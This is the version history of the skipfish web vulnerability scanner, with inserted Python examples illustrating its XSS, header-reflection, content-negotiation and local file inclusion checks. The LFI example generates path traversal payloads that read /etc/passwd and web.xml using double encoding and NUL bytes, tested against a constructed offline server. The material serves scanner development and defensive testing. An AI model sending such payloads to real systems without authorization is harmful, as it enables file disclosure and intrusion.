ChangeLog
Version 2.10b:
--------------
- Updated HTML tags and attributes that are checked for URL XSS
injections to also include a few HTML5 specific ones
- Updated test and description for semi-colon injection in HTML meta
refresh tags (this is IE6 specific)
- Relaxed HTML parsing a bit to allow spaces between HTML tag attributes
and their values (e.g. "foo =bar").
- Major update of the LFI tests, adding more dynamic tests (double
encoding, a dynamic number of ../'s for web.xml). The total number of
tests for this vulnerability is now 40 per injection point.
- The RFI test is now a separate test and no longer requires special
compile options. The default RFI URL and its payload check are
still defined in src/config.h.
- Using the --flush-to-disk flag will cause requests and responses
to be flushed to disk, which reduces the memory footprint (especially
noticeable in large scans).
- Fixed a bug where in some conditions (e.g. a page looks similar to
another) links were not scraped from responses, which led to links
being missed (thanks to Anurag Chaurasia for reporting).
- Added configuration file support with the --config flag. In
config/example.conf you can find flags and examples.
- Several signature keyword enhancements have been made. Most
significant are the "header" keyword, which allows header matching
and the "depend" keyword which allows signature chaining.
- Fixed basic authentication, which had been broken since 2.08b. Cheers to
Michael Stevens for reporting.
- Fixed -k scheduling where 1:0:0 would count as a second instead of
an hour (and vice versa). Cheers to Claudio Criscione for reporting.
- Small fix to compile time warnings
Version 2.09b:
--------------
- Fixed a crash that could be triggered during 404 fingerprint failures
- Signature IDs for detected issues are now stored in the report
JSON files.
- Added mod_status, mod_info, MySQL dump, phpMyAdmin SQL dump and
robots.txt signatures.
- Improved the Flash and Silverlight crossdomain policy signatures to
only warn about them when they use wildcards.
Version 2.08b:
--------------
- Added Host header XSS testing.
- Added HTML encoding XSS tests to detect scenarios where our
injection string ends up in an attribute that executes HTML-encoded
JavaScript, for example onclick.
- Bruteforcing is now disabled for URLs that gave a directory listing.
- Added subject alternative name checking for SSL certificates (cheers
to Matt Caroll for his feedback)
- Added signature matching (see doc/signatures.txt) which means a lot
of the content based issues are no longer hardcoded.
- Added active XSSI test. The passive XSSI stays (for now) but this
active check is more accurate and will remove issues detected by the
passive one if they cannot be confirmed. This reduces false positives.
- Added HTML tag XSS test which triggers when our payload is used
as a tag attribute value but without quotes (courtesy of wavsep).
- Added javascript: scheme XSS testing (courtesy of wavsep).
- Added form-based authentication. During these authenticated
scans, skipfish will check if the session has ended and re-authenticate
if necessary.
- Fixed a bug where in slow scans the console output could mess up
due to the high(er) refresh rate.
- Fixed a bug where a missed response during the injection tests could
result in a crash. (courtesy of Sebastian Roschke)
- Restructured the source package a bit by adding src/, doc/ and
tools/ directories.
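Added example, not skipfish's own code, illustrating the attribute-level XSS checks listed in the 2.10b entry (URL attributes, including HTML5 ones such as formaction, with whitespace tolerated around "=" as in `foo =bar`) and in the 2.08b entry (payload landing in an event handler after HTML entity decoding, unquoted attribute values, and javascript: URLs). The marker `sfi9876`, the URL_ATTRS list and the SAMPLE fragment are constructed for this example and are not skipfish's.

```python
import html
import re

# Injection marker the scanner planted in the request (constructed value).
MARKER = "sfi9876"

# Attributes whose value browsers treat as a URL. formaction and poster are
# HTML5 additions; the list is an assumption for this example.
URL_ATTRS = {"href", "src", "action", "formaction", "poster", "data",
             "background", "cite", "manifest", "codebase"}

TAG_RE = re.compile(r"<([a-zA-Z][\w:-]*)([^>]*)>", re.S)

# One attribute: a name, then optionally "=" with whitespace allowed on either
# side (so `foo =bar` and `foo= "bar"` both parse), then a quoted or bare value.
ATTR_RE = re.compile(
    r"""([^\s"'=<>/]+)           # attribute name
        (?:\s*=\s*               # "=" with optional surrounding whitespace
          (?:"([^"]*)"           # double-quoted value
           |'([^']*)'            # single-quoted value
           |([^\s"'<>`]+)        # unquoted value
          ))?""",
    re.S | re.X)


def scan_attributes(body, marker=MARKER):
    """Return (tag, attribute, kind) for every attribute in which the marker
    lands somewhere a browser would act on it."""
    findings = []
    for tag in TAG_RE.finditer(body):
        tag_name, attr_text = tag.group(1).lower(), tag.group(2)
        for m in ATTR_RE.finditer(attr_text):
            name = m.group(1).lower()
            raw = next((g for g in m.group(2, 3, 4) if g is not None), None)
            if raw is None:
                continue                      # boolean attribute, no value
            # Browsers decode character references before the value reaches
            # the URL or JavaScript parser, so compare the decoded form.
            value = html.unescape(raw)
            if marker not in value:
                continue
            if m.group(4) is not None:
                # Unquoted value: a space in the payload starts a new attribute.
                findings.append((tag_name, name, "unquoted_attr_xss"))
            if name.startswith("on"):
                kind = "event_handler_xss"
                if marker not in raw:
                    kind += "_html_encoded"   # only visible after entity decoding
                findings.append((tag_name, name, kind))
            elif name in URL_ATTRS:
                head = value.lstrip().lower()
                if head.startswith(marker):
                    findings.append((tag_name, name, "url_xss"))   # we choose the scheme
                elif head.startswith("javascript:"):
                    findings.append((tag_name, name, "javascript_url_xss"))
    return findings


# Constructed response fragment with the marker reflected in several places.
ENCODED_MARKER = "".join(f"&#{ord(c)};" for c in MARKER)
SAMPLE = f"""
<a href ="{MARKER}/profile">me</a>
<button formaction= "{MARKER}">go</button>
<img src="/static/{MARKER}.png">
<div onclick="track('{ENCODED_MARKER}')">x</div>
<input type=text value={MARKER}>
<a href='javascript:show("{MARKER}")'>show</a>
"""

if __name__ == "__main__":
    for finding in scan_attributes(SAMPLE):
        print(*finding)
```

The img case deliberately produces nothing: the marker sits inside a URL but does not control its scheme, which is a different (and weaker) condition than the one the URL XSS test is after.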
Version 2.07b:
--------------
- A bugfix to fprint_response() will help reduce false positives that
could occur for differential tests (i.e. the query and shell injection
tests)
- We now suppress implicit cache warnings when dealing with 302, 303 and 307
redirects.
- Added --no-checks which allows a scan to be run without any injection
tests. This still allows bruteforcing and combines well with the
new ability to load URLs from previous scan results.
- We can now parse the pivots.txt, which can be found in the output
directory of older scans. All URLs will be loaded which seriously
speeds up recurring scans.
- Directory bruteforcing now includes a content negotiation trick where
using a fake MIME type in the Accept: header will cause some servers to
propose files to us via a 406 response.
- Fixed a horrible bug which caused unstable pages not to be marked
as such. The result: false positives.
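Added example, not skipfish's code, of the content negotiation trick in the 2.07b entry above: request a path with an Accept type that no variant can satisfy, and a server running MultiViews-style negotiation answers 406 and enumerates the files it could have served (backup copies of a script included). The 406 format follows Apache mod_negotiation's Alternates header (RFC 2295 syntax) and its "Available variants" body; the fake MIME type, the stand-in server and its directory listing are constructed so the example runs offline.

```python
import re

# Entries of an RFC 2295 Alternates header look like {"name" quality {type ...}}
ALTERNATE_RE = re.compile(r'\{"([^"]+)"')
# Links in the "Available variants" list Apache puts in the 406 body
LINK_RE = re.compile(r'<a href="([^"]+)">')

# A MIME type no real variant will ever carry (constructed value).
FAKE_MIME = "sfi/sfi9876"


def discover_variants(path, send):
    """Request `path` with an Accept header nothing can satisfy; if the server
    answers 406, collect every variant it offers from the Alternates header
    and the HTML body and return them as paths in the same directory."""
    status, headers, body = send(path, FAKE_MIME)
    if status != 406:
        return []
    names = set(ALTERNATE_RE.findall(headers.get("Alternates", "")))
    names.update(LINK_RE.findall(body))
    base = path.rsplit("/", 1)[0] + "/"
    # keep bare file names only; ignore anything that would leave the directory
    return sorted(base + n for n in names if "/" not in n and ".." not in n)


# --- constructed stand-in for a MultiViews-style server so the example runs offline ---
FAKE_DIR = {   # what is really on disk in /admin/
    "login.html": "text/html",
    "login.php": "application/x-httpd-php",
    "login.php.bak": "application/octet-stream",
    "login.php~": "application/octet-stream",
    "index.html": "text/html",
}


def fake_multiviews(path, accept):
    """A request for /admin/login matches every file named login.*; if one
    matches the Accept type it is served (200), otherwise the server lists
    all candidates in a 406, which is the behaviour the probe relies on."""
    stem = path.rsplit("/", 1)[-1] + "."
    candidates = {n: t for n, t in FAKE_DIR.items() if n.startswith(stem)}
    if not candidates:
        return 404, {}, "Not Found"
    if any(t in accept for t in candidates.values()):
        return 200, {"Content-Type": accept}, "<html>served</html>"
    alternates = ", ".join(f'{{"{n}" 1 {{type {t}}}}}' for n, t in candidates.items())
    body = ("<p>Available variants:</p><ul>"
            + "".join(f'<li><a href="{n}">{n}</a></li>' for n in candidates)
            + "</ul>")
    return 406, {"Alternates": alternates, "TCN": "list"}, body


if __name__ == "__main__":
    print(discover_variants("/admin/login", fake_multiviews))
```

The fake type is the whole point: asking for text/html gets login.html served with a 200 and reveals nothing, while a type nobody has forces the server to show its hand. Names are parsed from both the header and the body because not every server sends both.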
Version 2.06b:
--------------
- Crawler update which gives more control over the injection test
scheduling. This comes with the --checks and --checks-toggle
flags to display and enable/disable checks.
- Pages where the response varies are no longer completely
discarded. Instead, only the tests that require stability are disabled,
which increases scan coverage.
- Split the traversal and disclosure test to increase coverage:
traversal checks require stable pages, the disclosure checks can be
performed on all.
- Updated dictionaries and converted them to use the dictionary
optimisations we introduced in 2.03b
- Fixed offline report viewing (thanks to Sebastian Roschke)
- Added NULL byte file disclosure tests
- Added JSP inclusion error check to analyse.c
- Added XSS injection tests for cookies
- Directory listings are now reported as individual (info-type) issues
- Added warning in case the negotiated SSL cipher turns out to be a
weak one (leaving the cipher enumeration to network scanners)
- Added experimental -v flag which can be used to enable (limited)
runtime reporting. This output is written to stderr and should be
redirected to a file, unless you use the -u flag.
- The man page has been rewritten and now includes detailed descriptions
and examples.
- A whole bunch of small bug fixes
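Added example, not skipfish's code, of the payload set behind the 2.10b LFI entry (double encoding and a traversal depth derived from the URL for web.xml) and the NULL byte file disclosure tests from the 2.06b entry above. It generates every combination of target, number of ../ segments, encoding level and NUL suffix, then runs them against a constructed stand-in for a vulnerable include so the probe can be checked offline. The target files and their markers, MAX_FS_DEPTH, the fake filesystem and the once-decoding, NUL-truncating include are all assumptions made for the example.

```python
import posixpath
from urllib.parse import quote, unquote

# Files worth reading and the substring that proves the read succeeded
# (markers are assumptions for this example).
TARGETS = {
    "/etc/passwd": "root:x:0:0",      # absolute: the number of ../ is unknown
    "WEB-INF/web.xml": "<web-app",     # relative to the webapp root
}
MAX_FS_DEPTH = 6   # how far above us the document root may sit (assumption)


def traversal_depth(url_path):
    """Directory levels between the injected page and the document root."""
    return sum(1 for seg in url_path.split("/")[:-1] if seg)


def encode(payload, level):
    """level 0: raw, 1: URL-encoded once, 2: double-encoded (for a server
    that decodes twice, or a filter that only inspects the once-decoded form)."""
    if level == 0:
        return payload.replace("\0", "%00")   # a literal NUL cannot travel in a URL
    for _ in range(level):
        payload = quote(payload, safe="")
    return payload


def lfi_payloads(url_path):
    """Yield (payload, target): every target, every plausible number of ../
    for this URL, three encodings, each with and without a NUL terminator."""
    url_depth = traversal_depth(url_path)
    for target in TARGETS:
        if target.startswith("/"):
            variants = [target] + ["../" * n + target[1:]
                                   for n in range(1, MAX_FS_DEPTH + 1)]
        else:
            # web.xml sits at the webapp root, so the depth follows from the URL;
            # one extra level covers includes resolved from a subdirectory.
            variants = ["../" * n + target for n in range(1, url_depth + 2)]
        for variant in variants:
            for level in (0, 1, 2):
                for suffix in ("", "\0"):
                    yield encode(variant + suffix, level), target


def probe(url_path, send):
    """Send every payload through send(url_path, param) -> body and report
    the (payload, target) pairs whose response contains the target's marker."""
    return [(payload, target) for payload, target in lfi_payloads(url_path)
            if TARGETS[target] in send(url_path, payload)]


# --- constructed stand-in for a vulnerable server so the example runs offline ---
DOCROOT = "/var/www/app"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/sh\n",
    "/var/www/app/WEB-INF/web.xml": "<web-app><servlet/></web-app>",
    "/var/www/app/pages/header.inc": "<h1>site</h1>",
}


def fake_include(url_path, param):
    """Decode once, append .inc, truncate at NUL (old PHP behaviour) and resolve
    relative to the directory of the requested page."""
    name = (unquote(param) + ".inc").split("\0")[0]
    base = posixpath.dirname(posixpath.join(DOCROOT, url_path.lstrip("/")))
    resolved = posixpath.normpath(posixpath.join(base, name))
    return FAKE_FS.get(resolved, "file not found")


if __name__ == "__main__":
    for payload, target in probe("/pages/view.php", fake_include):
        print(f"{target:16} <- {payload}")
```

Against this server only the NUL-terminated, at most once-encoded payloads succeed, and web.xml is reached with exactly one ../ while /etc/passwd needs four or more: the two kinds of target need different depth logic, which is why the generator treats them separately.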
Version 2.05b:
--------------
- Fixed a NULL pointer crash when adding "callback" tests to JavaScript
URLs that have a parameter with no value.
- Bug fix in the redirect callback which expected 2 responses but
since 2.04b actually should process 4.
Version 2.04b:
--------------
- Option -V eliminated in favor of -W / -S.
- Option -l added to limit the maximum requests per second (contributed by Sebastian Roschke)
- Option -k added to limit the maximum duration of a scan (contributed by Sebastian Roschke)
- Support for #ro, -W-; related documentation changes.
- HTTPS -> HTTP form detection.
- Added more diverse traversal and file disclosure tests (including file:// scheme tests)
- Improved injection detection in <script> sections, where a ' or "
is all we need to inject js code.
- Added a check to see if our injection strings end up in the server's
Set-Cookie, Set-Cookie2 and Content-Type response headers
- URLs that give us a Javascript response are now tested with a
"callback=" parameter to find JSONP issues.
- Fixed "response varies" bug in 404 detection where a stable page would be marked unstable.
- Bugfix to es / eg handling in dictionaries.
Version 2.03b:
--------------
- Fixed a minor glitch in form parsing in analysis.c, courtesy of
Niloufar Pahlevan Sadegh.
- Two database.c bugfixes to wordlist handler, courtesy of Shaojie Wang.
Version 2.02b:
--------------
- Fixed a minor NULL pointer crash in -Y mode.
Version 2.01b:
--------------
- Substantial improvement to SQL injection checks.
- Improvements to directory traversal checks (courtesy of Niels Heinen).
- Fix to numerical brute-force logic.
- Major improvement to directory brute force: much better
duplicate elimination in some webserver configurations.
- Added a check for attacker-controlled prefixes on inline responses.
This currently leads to UTF-7 BOM XSS, Flash, Java attacks (thanks to
Niels Heinen).
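Added example, not skipfish's code, of the reflection-position checks from the 2.04b entry (injection strings landing in Set-Cookie, Set-Cookie2 or Content-Type response headers; callback= reflected at the start of a JavaScript response, i.e. JSONP) and from the 2.01b entry above (an attacker-controlled prefix on an inline response, the precondition for the UTF-7 BOM, Flash and Java tricks). The marker and the five sample responses are constructed for the example; a real scanner would get the raw response from its HTTP client.

```python
# Marker planted in the request parameter under test (constructed value).
MARKER = "sfi9876"

# Response headers where a reflected parameter hands the attacker control over
# cookies or over how the body is parsed.
SENSITIVE_HEADERS = ("set-cookie", "set-cookie2", "content-type")
JS_TYPES = ("application/javascript", "application/x-javascript", "text/javascript")


def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def header_values(headers, name):
    return [value for key, value in headers if key == name]


def analyze(raw, marker=MARKER):
    _status, headers, body = parse_response(raw)
    findings = []
    for name in SENSITIVE_HEADERS:
        for value in header_values(headers, name):
            if marker in value:
                findings.append(("header_injection", name))
    ctype = (header_values(headers, "content-type") or [""])[0]
    ctype = ctype.split(";")[0].strip().lower()
    inline = not any("attachment" in v.lower()
                     for v in header_values(headers, "content-disposition"))
    # JSONP: the callback parameter names the function that wraps the data,
    # so any page that can <script src=> this URL reads it.
    if ctype in JS_TYPES and body.lstrip().startswith(marker + "("):
        findings.append(("jsonp_callback", ctype))
    # Controlled prefix: at offset 0 the attacker can supply a UTF-7 BOM
    # (+/v8), a Flash (CWS/FWS) or a Java class header and make some clients
    # reinterpret the whole inline response. Downloads are not affected.
    if inline and body.startswith(marker):
        findings.append(("controlled_prefix", ctype))
    return findings


# Constructed responses to a request carrying the marker.
RESPONSES = {
    "header_echo": ("HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=sfi9876\r\n"
                    "Set-Cookie: lang=sfi9876; Path=/\r\n\r\n<html>ok</html>"),
    "jsonp": ("HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n\r\n"
              'sfi9876({"user": "bob", "admin": false})'),
    "prefix": ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n"
               "sfi9876 is not a valid id"),
    "download": ("HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n"
                 "Content-Disposition: attachment; filename=export.txt\r\n\r\n"
                 "sfi9876,1,2"),
    "body_only": ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  "<p>No results for sfi9876</p>"),
}

if __name__ == "__main__":
    for name, raw in RESPONSES.items():
        print(name, analyze(raw))
```

The body_only case is reported by nothing here on purpose: a marker in the middle of an HTML body belongs to the tag and attribute XSS checks, whereas these checks only care about headers and about who controls the first bytes of the response.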
Version 2.00b:
--------------
- Minor bug fix to path parsing to avoid problems with /.$foo/,
- Improved PHP error detection (courtesy of Niels Heinen),
- Improved dictionary logic (courtesy of Niels Heinen) and new
documentation of the same,
- Improved support for file.ext keywords in the dictionary,
- Fixed missing content_checks() in unknown_check_callback()
(courtesy of Niels Heinen),
- Improved an oversight in dictionary case sensitivity,
- Improved pivots.txt data,
- Support for supplementary read-only dictionaries (-W +dict),
- Change to directory detection to work around a certain sneaky
server behavior.
- TODO: Revise dictionaries!!!
Version 1.94b:
--------------
- Proxy support! Currently only works for HTTP, put behind #ifdef
PROXY_SUPPORT.
- Change to prefix() and change_prefix() macros to limit the risk of bugs.
Version 1.93b:
--------------
- Major fix to URL XSS detection logic (courtesy of Niels Heinen).
Version 1.92b:
--------------
- Reading starting URLs from file is now supported (@ prefix).
Version 1.90b / 1.91b:
----------------------
- Minor fix to pivots.txt.
Version 1.89b:
--------------
- Skipfish now saves all discovered URLs in a single file for third-party
tools: pivots.txt.
Version 1.88b:
--------------
- Dictionary improvements, contd.
Version 1.87b:
--------------
- Dictionary improvements.
Version 1.86b:
--------------
- HTTP auth header value changed from "basic" to "Basic" to
compensate for picky web frameworks.
- Minor fix to time display code.
Version 1.85b:
--------------
- Minor refinements to the content analysis module.
Version 1.84b:
--------------
- Option -S removed.
Version 1.83b:
--------------
- Minor fix to -e behavior.
Version 1.82b:
--------------
- NULL pointer in is_javascript() fixed.
Version 1.81b:
--------------
- Fix to numerical SQL injection detector logic.
Version 1.80b:
--------------
- New option (-e) to delete binary payloads.
- -J option is now obsolete (on by default).
Version 1.79b:
--------------
- Improvement to directory listing detector.
Version 1.78b:
--------------
- Fix to -J logic.
Version 1.77b:
--------------
- Further minor documentation and presentation tweaks.
Version 1.76b:
--------------
- Major clean-up of dictionary instructions.
Version 1.75b:
--------------
- iPhone U-A support added.
Version 1.74b:
--------------
- Non-HTTPS password form analysis added.
Version 1.73b:
--------------
- Silence some pointless compiler warnings on newer systems.
Version 1.72b:
--------------
- Minor beautification stuff.
Version 1.71b:
--------------
- Child signatures now exposed in the report,
- Improvements to duplicate node detection,
- sfscandiff tool added to compare reports.
Version 1.70b:
--------------
- Improved SQL syntax detection slightly to avoid phone number FP.
- Removed obsolete allocator flags.
Version 1.69b:
--------------
- Minor improvements to parameter encoding, User-Agent controls.
Version 1.68b:
--------------
- Password detector improvement.
Version 1.67b:
--------------
- Improved directory detection logic.
- Some dictionary updates.
Version 1.65b:
--------------
- Relaxed MIME matching on claimed CSS/JS that fails MIME sniffing logic.
- Proper detection of @media in CSS.
Version 1.64b:
--------------
- Changed param injection check slightly to work better with WordPress.
Version 1.62b:
--------------
- Further refinements to content classifier.
Version 1.60b:
--------------
- Minor sniffer fix to better handle CSV file checks.
Version 1.59b:
--------------
- Fixed several file POI checks that depended on MIME information.
Version 1.58b:
--------------
- Descendant limit checks added.
Version 1.57b:
--------------
- Splash screen added (grr).
Version 1.56b:
--------------
- Path-based injection attacks now also carried out on file / pathinfo nodes.
- Minor bugfix to try_list logic.
- Slight tweak to form parsing to properly handle specified but empty action=
strings.
Version 1.55b:
--------------
- Improved 404 directory no-parse checks.
Version 1.54b:
--------------
- Improved loop detector on mappings that only look at the last path segment.
Version 1.53b:
--------------
- Slight improvement to JSON discriminator.
Version 1.52b:
--------------
- Fixed HTTP read loop after 1.48b.
Version 1.51b:
--------------
- abort() instead of exit() in several places.
- Cleaned up mem leak, incorrect use of ck_free() in IDN handling.
Version 1.49b:
--------------
- Minor improvement to the allocator,
- Several directory listing signatures added.
Version 1.48b:
--------------
- A fix to SSL handling to avoid mystery fetch failures when
talking to certain servers.
Version 1.47b:
--------------
- Minor tweaks around compiler warnings, etc.
- Versioned directories now in use.
- malloc_usable_size ditched in favor of djm's trick.
- Minor performance tweaks as suggested by Jeff Johnson.
Version 1.46b:
--------------
- Security: fixed a potential read past EOB in scrape_response() on
zero-sized payloads. Credit to Jeff Johnson.
- Removed redundant fdopen() in dictionary management,
Version 1.45b:
--------------
- Minor aesthetic tweaks to the report viewer.
- Report subnode ordering now a bit saner.
Version 1.44b:
--------------
- Significant improvement to numerical SQL injection detector.
- Minor tweak to SQL message detection rules.
Version 1.43b:
--------------
- Improvement to reduce the likelihood of crawl loops: do not
extract links if current page identical to parent.
Version 1.42b:
--------------
- Fix to SQL injection detection with empty parameters.
Version 1.41b:
--------------
- Logic change: if response varies, directory brute force is
also skipped.
Version 1.40b:
--------------
- Command-line option not to descend into 5xx directories.
Version 1.39b:
--------------
- Option to override 'Range' header from the command line.
Version 1.38b:
--------------
- Decompression now honors user-specified size limits more reliably.
- Retry logic corrected to account for certain Oracle servers.
- Terminal I/O fix for debug mode.
Version 1.37b:
--------------
- NULL ptr with -F fixed.
Version 1.36b:
--------------
- Command-line support for parameters that should not be fuzzed.
- In-flight URLs can be previewed by hitting 'return'.
Version 1.35b:
--------------
- Several new form autocomplete rules.
Version 1.34b:
--------------
- A small tweak to file / dir discriminator logic to accommodate
quirky frameworks.
Version 1.33b:
--------------
- New SQL error signature added.
- Improved tolerance for tabs in text page detector.
Version 1.32b:
--------------
- A minor fix for embedded URL auth detection.
Version 1.31b:
--------------
- Compilation with USE_COLOR commented out now works as expected.
- Fix to detect <frame> tags.
Version 1.30b:
--------------
- Support for the (rare) <button> tag in forms.
- Fixed compiler warning on some platforms.
Version 1.29b:
--------------
- Forms with no action= URL are now handled correctly.
- New option (-u) to suppress realtime info,
- Destination host displayed on stats screen.
Version 1.27b:
--------------
- Tweak to CFLAGS ordering to always enforce FORTIFY_SOURCE.
- Man page added.
Version 1.26b:
--------------
- phtml added to the dictionary.
- Yet another workaround for MALLOC_CHECK_. Grr.
Version 1.25b:
--------------
- A limit on the number of identically named path elements added. This
is a last-resort check against endless recursion (e.g., for 'subdir'
-> '.' symlinks).
Version 1.24b:
--------------
- XSS detection now accounts for commented out text.
Version 1.23b:
--------------
- A minor improvement to XHTML detection.
- HTML vs XHTML mismatches no longer trigger a warning.
Version 1.22b:
--------------
- URL parser now accounts for its own \.\ injection pattern.
Version 1.19b:
--------------
- New ODBC POI added.
- Apache config file detection tightened up.
Version 1.18b:
--------------
- Fix a potential NULL ptr deref with malformed Set-Cookie.
- Another last-resort HTML detection pattern added.
Version 1.17b:
--------------
- JS detector refined not to trigger on certain text/plain inputs.
Version 1.16b:
--------------
- Fixed a typo introduced in 1.16 to index.html (d'oh).
- Further refinements to Makefile CFLAGS / LIBS / LDFLAGS to keep package
maintainers happy.
Version 1.15b:
--------------
- Better documentation on why certain issues are not reported by skipfish.
- Another minor tweak to improve path mapping detection logic.
Version 1.14b:
--------------
- Several new wordlist entries, courtesy of Glastopf Honeypot:
http://glastopf.org/index.php
- A tweak to path mapping detection logic to detect certain path mappings
that may result in crawl loops.
- Makefile now honors external LDFLAGS, CFLAGS.
- Some more documentation tweaks and rewrites.
- PUT detection logic added.
Version 1.13b:
--------------
- Improved password, file form detection slightly.
Version 1.12b:
--------------
- Improved visibility of the KnownIssues page (reports, Makefile).
- The location of assets/ directory is now configurable.
Version 1.11b:
--------------
- SIGWINCH support: you can now cleanly resize your window while scanning.
- Typo in report category name fixed.
- Terminal color fix (for users with non-standard color themes).
- Corrected icons license (GPL -> LGPL).
- Fixed a typo in -b ffox headers.
- Fixed a potential NULL ptr deref when doing form parsing.
Version 1.10b:
--------------
- Fix to extensions-only.wl (some bad keywords removed).
Version 1.09b:
--------------
- Fix for a potential NULL ptr deref in probabilistic scan mode (<100%).
Version 1.08b:
--------------
- A minor improvement to XHTML / XML detection.
Version 1.07b:
--------------
- Several build fixes for FreeBSD, MacOS X (-I, -L paths).
Version 1.06b:
--------------
- Minor documentation updates, typos fixed, etc.
Version 1.05b:
--------------
- A more robust workaround for FORTIFY_SOURCE (MacOS X).
Version 1.04b:
--------------
- Workaround for *BSD systems with malloc J or Z options set by default
(0x5a5a5a5a deref after realloc()).
- A minor tweak to reject certain not-quite-URLs extracted from JS.
Version 1.01b:
--------------
- Workaround for a glitch in FORTIFY_SOURCE on Linux (causing crash
on startup).
Version 1.00b:
--------------
- Initial public release.